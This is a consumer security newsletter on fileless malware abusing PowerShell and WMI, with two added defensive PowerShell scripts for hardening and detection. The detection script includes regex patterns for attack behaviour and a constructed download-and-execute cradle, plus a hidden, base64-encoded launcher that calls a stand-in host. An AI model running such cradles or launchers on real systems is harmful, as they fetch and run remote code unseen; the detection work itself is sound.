Undetectable Fileless Malware Threatens Businesses and Consumers

Most security software can’t detect fileless malware attacks, so what can you do?: Internet Scambusters #837

Fileless malware is one of the biggest challenges facing security software vendors, because it leaves no file on the hard drive for a scanner to inspect.

Right now, it’s a growing threat to businesses but consumers could be next in the scammers’ sights.

So, what is fileless malware and is there anything you can do to protect your PC from infection? We have some answers for you in this week’s issue.

Let’s get started…


Undetectable Fileless Malware Threatens Businesses and Consumers


Most malware sneaks onto your computer via files you accidentally download — but watch out now for a growing fileless threat!

Traditional malware files that hook onto you via emails and infected websites have to be downloaded onto your hard drive and then be activated in some way to do their dastardly deeds.

But that is so last year.

In the never-ending pursuit of cleverer software, hackers and scammers have developed attacks whose code runs only in a computer's RAM (random access memory), using programs that are already part of Windows, so there is no new file on the hard drive for security software to scan.

According to Internet security specialists Malwarebytes, this form of attack makes it nearly impossible for antivirus signatures to trigger a detection.

In some cases, the only way for security firms to identify them is to catch them in the act, that is, while they're running in RAM. After you switch off your computer, RAM is wiped, which is why the more persistent versions also hide a small re-launch instruction in the Windows registry or in WMI so they can reload at the next boot.

“This is one of the biggest challenges when dealing with fileless malware,” the company admits.

Another security expert, Fred O’Connor at Cybereason, echoes their concerns: “The fact that traditional malware isn’t used is an important point. This means that there’s no signature for antivirus software to detect, greatly decreasing the effectiveness of these programs in detecting fileless malware attacks.”

Fileless malware is not new but current versions are way more advanced than older ones. The kits that enable crooks to use them are also now being distributed more widely than they were a few years ago.

How it Works

In very simple terms, fileless malware doesn't install a program of its own. It hijacks tools that are already built into Windows and already trusted by it, notably, for the technically minded, Windows PowerShell, a scripting engine that can download and run code without ever saving it to disk.

It feeds those tools its own commands, and they do its bidding.

“Using legitimate programs makes these attacks nearly undetectable by most security programs and even skilled security analysts,” says O’Connor. “The reason is simple: (these components) are legitimate programs, any command they execute is assumed to also be legitimate.”

How does your computer get infected?

Well, by pretty much the same tactics as with traditional malware, like spam emails and dubious websites. The difference is what happens next: instead of dropping a program onto your hard drive, the attack hands its instructions straight to a trusted Windows tool, and nothing is written to disk for a scanner to catch.

Say, for example, you want to watch a video, and the page serves a booby-trapped Adobe Flash file or a fake Flash update. As soon as it runs, it tells a built-in tool such as PowerShell to fetch the malicious script and run it straight from memory. That script then scours the computer for confidential information and sends what it finds back to its creator.

“Does that mean traditional anti-virus suites are useless in detecting this new type of computer takeover?” asks another online security specialist, Tripwire.

“Yep, that’s exactly what it means.”

There's a good chance that once a trusted tool like PowerShell has been hijacked in this way, a crook can sit there undetected for however long they like, pilfering data at their convenience.

The good news, if you can call it that, is that fileless malware is currently being used mainly to target businesses rather than individuals, and they should know (or find out if they don't) how to lock down and log Windows PowerShell and another component called Windows Management Instrumentation (WMI). Switching PowerShell off outright isn't realistic, since Windows itself relies on it; the practical steps are to turn on its logging so every script it runs is recorded, remove the old version 2 engine that attackers use to dodge that logging, and restrict who is allowed to run scripts.

This, however, is not something home users should try to do unless they have a good degree of expertise. Savvy users can also disable mini-programs known as macros that run inside software like Microsoft Office, through the Trust Center settings in each Office application.
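As an added illustration (this is editor-supplied example code, not from Scambusters or from any of the firms quoted), here is a PowerShell script that carries out the lock-down steps just described and lists any WMI event subscriptions already present on the machine. It assumes Windows 10 or 11 with PowerShell 5 or later, an Administrator prompt, and the Office "16.0" policy branch (Office 2016/2019/365) for the macro settings; the registry paths and value names are Microsoft's documented policy settings.

```powershell
# Added example, not from the Scambusters article: audit and lock down the
# Windows components that fileless malware abuses. Run from an elevated
# (Administrator) PowerShell prompt on Windows 10/11 with PowerShell 5+.
# Registry paths and value names are Microsoft's documented policy settings;
# the Office "16.0" branch (Office 2016/2019/365) is an assumption.
#Requires -RunAsAdministrator

# 1. Record the full text of every script PowerShell runs (Event ID 4104 in the
#    Microsoft-Windows-PowerShell/Operational log), including scripts that were
#    downloaded straight into memory and never touched the disk.
$sbl = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
New-Item -Path $sbl -Force | Out-Null
Set-ItemProperty -Path $sbl -Name EnableScriptBlockLogging -Value 1 -Type DWord

# 2. Record pipeline activity for every module (Event ID 4103).
$ml = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging'
New-Item -Path "$ml\ModuleNames" -Force | Out-Null
Set-ItemProperty -Path $ml -Name EnableModuleLogging -Value 1 -Type DWord
New-ItemProperty -Path "$ml\ModuleNames" -Name '*' -Value '*' -PropertyType String -Force | Out-Null

# 3. Remove the old PowerShell 2.0 engine, which predates both script logging
#    and the AMSI scanning hook; attackers start it on purpose ("-version 2")
#    to run unlogged. Windows 10/11 keep it as an optional feature.
$v2 = Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root
if ($v2.State -eq 'Enabled') {
    Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -NoRestart | Out-Null
    Write-Host 'PowerShell 2.0 engine removed.'
}

# 4. List WMI permanent event subscriptions. A filter (trigger) + consumer
#    (payload) + binding triple is how fileless malware re-launches itself at
#    every boot without a file on disk. A clean workstation normally has none,
#    though some backup and management agents register their own, so review
#    every entry by hand rather than deleting blindly.
$ns = 'root\subscription'
Write-Host "`n== WMI event filters (triggers) =="
Get-CimInstance -Namespace $ns -ClassName __EventFilter | Select-Object Name, Query
Write-Host "`n== WMI event consumers (payloads) =="
Get-CimInstance -Namespace $ns -ClassName __EventConsumer |
    Select-Object Name, @{ n = 'Type'; e = { $_.CimClass.CimClassName } }, CommandLineTemplate, ScriptText
Write-Host "`n== Bindings (which trigger fires which payload) =="
Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding | Select-Object Filter, Consumer

# 5. Block Office macros by policy for the current user: VBAWarnings 4 =
#    disable all macros without notification; the second value refuses macros
#    in documents that arrived from the Internet (Mark of the Web).
$office = 'HKCU:\SOFTWARE\Policies\Microsoft\Office\16.0'
foreach ($app in 'Word', 'Excel', 'PowerPoint') {
    $key = "$office\$app\Security"
    New-Item -Path $key -Force | Out-Null
    Set-ItemProperty -Path $key -Name VBAWarnings -Value 4 -Type DWord
    Set-ItemProperty -Path $key -Name blockcontentexecutionfrominternet -Value 1 -Type DWord
}
Write-Host "`nDone. Review the WMI entries above before removing any of them."
```

Step 4 only lists the subscriptions; deciding whether a CommandLineEventConsumer that launches PowerShell at boot is malware or a legitimate agent is exactly the judgement call the article says home users should leave to someone with expertise.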

Standard Defenses

For companies too, specialist security services offer expensive monitoring and detection (endpoint detection and response, or EDR, which watches what programs do rather than what files look like). For the rest of us, the standard defenses apply:

  • Don't visit dubious websites.
  • Don't click on links in unexpected emails, even if they appear to come from a company you know.
  • Keep all your software, including Internet security programs, updated.
  • Encrypt or password-protect all files containing confidential data.
  • Monitor bank, credit card, and store sites for signs that someone is using your ID.

In the meantime, security software has to watch the targeted Windows components themselves rather than just the hard drive. Windows 10 already provides the hook for this: the Antimalware Scan Interface (AMSI) hands every PowerShell script to the installed security program at the moment it runs, even if it was never saved to disk, and PowerShell can log the full text of every script it executes. The job for security firms is to make use of those records.

Then, as they learn what these scripts look like and, more importantly, what they do, they'll be able to hunt for them.

Microsoft, for example, recently announced it had developed tools to detect two major fileless malware code scripts, but there are likely scores or even hundreds of these in circulation. Recognizing them by their text means identifying and neutralizing them one script at a time; the more durable approach is to flag what the script does, such as downloading code from the Internet and running it straight from memory, however it happens to be written.
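As an added example of the hunting the article is describing (editor-supplied, not Microsoft's tool or any vendor's signatures), here is a PowerShell script that scans the script-block records PowerShell itself keeps (Event ID 4104) for the behaviour a download-and-run-in-memory attack has to exhibit, and decodes the base64 launchers that hide it. The indicator patterns, the two-hit threshold and the three sample script blocks are this example's own assumptions; the samples are constructed and use the reserved example.invalid host name.

```powershell
# Added example, not from the Scambusters article: detection logic for the
# script blocks PowerShell 5+ records as Event ID 4104. The event carries the
# decoded text of each block at the moment it runs, so an in-memory script
# leaves this trace even though it never existed as a file. The indicator
# patterns, threshold and sample script blocks are this example's own choices,
# not a vendor's signatures; the samples are constructed, not captured.

# Indicator families. A single hit is common in legitimate admin scripts;
# two or more in one block is the bar used here for "suspicious".
$Indicators = [ordered]@{
    'download cradle'     = 'DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer'
    'dynamic evaluation'  = 'Invoke-Expression|\biex\b'
    'hidden/unrestricted' = '-nop\b|-noprofile|-noni\b|-w(indowstyle)?\s+hidden|-e(xecution)?p(olicy)?\s+bypass'
    'in-memory loading'   = 'Reflection\.Assembly\]::Load|VirtualAlloc|Add-Type|Marshal\]::Copy'
    'base64 payload'      = 'FromBase64String'
    'WMI persistence'     = '__EventFilter|__FilterToConsumerBinding|CommandLineEventConsumer|ActiveScriptEventConsumer'
}

function Test-ScriptBlock {
    param([Parameter(Mandatory)][string]$Text)
    $hits = [System.Collections.Generic.List[string]]::new()
    $decoded = $null
    # -EncodedCommand payloads are base64 of UTF-16LE text; decode and scan
    # the inner command as well, since that is where the real cradle hides.
    if ($Text -match '-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})') {
        try {
            $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[2]))
            $hits.Add('encoded command')
        } catch { }
    }
    foreach ($family in $Indicators.Keys) {
        $pattern = $Indicators[$family]
        if ($Text -match $pattern -or ($decoded -and $decoded -match $pattern)) {
            $hits.Add($family)
        }
    }
    [pscustomobject]@{
        Suspicious = ($hits.Count -ge 2)
        Indicators = ($hits -join ', ')
        Decoded    = $decoded
        Text       = $Text
    }
}

function Get-SuspiciousScriptBlockEvent {
    # Scan the live log on this machine. PowerShell 5 writes 4104 events for
    # blocks its own heuristics consider suspicious even before logging is
    # switched on by policy, so the log is worth checking on any Windows 10 PC.
    param([int]$MaxEvents = 1000)
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Property index 2 of a 4104 event is ScriptBlockText.
            $text = $_.Properties[2].Value
            if ($text) {
                $r = Test-ScriptBlock -Text $text
                if ($r.Suspicious) {
                    [pscustomobject]@{
                        Time       = $_.TimeCreated
                        Indicators = $r.Indicators
                        Snippet    = $text.Substring(0, [Math]::Min(100, $text.Length))
                    }
                }
            }
        }
}

# Constructed samples: a normal admin command, a download cradle of the kind
# the Flash example in the article describes, and the same cradle wrapped in
# a hidden, encoded launcher the way a booby-trapped file would start it.
$benign   = "Get-ChildItem -Path C:\Users -Recurse -Filter *.docx | Select-Object FullName"
$cradle   = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
$encoded  = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cradle))
$launcher = "powershell.exe -nop -w hidden -enc $encoded"

foreach ($sample in $benign, $cradle, $launcher) {
    Test-ScriptBlock -Text $sample | Select-Object Suspicious, Indicators
}
```

Run it once to see the three constructed samples scored, then call Get-SuspiciousScriptBlockEvent to check the live log on the machine. The benign command is not flagged; the cradle is flagged on its download and evaluation behaviour; the encoded launcher is flagged both on its own hidden-window switches and on the cradle decoded from its payload, which is the point of decoding rather than matching on the base64 text.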

Expect to hear more about fileless malware in the coming year.

Alert of the Week

The early days of the New Year are a favorite time for crooks to step up their unpaid fines scam. They claim to be police, “clearing up” arrest warrants, and demand immediate payment either via money-wire or gift cards.

Ignore these demands and threats, which arrive by phone or email. If you have concerns (or an unpaid fine) call your local police department. And note: Outstanding fines are required to be paid by check, cash, or, sometimes credit cards, not untraceable gift cards or money wire services.

That’s it for today — we hope you enjoy your week!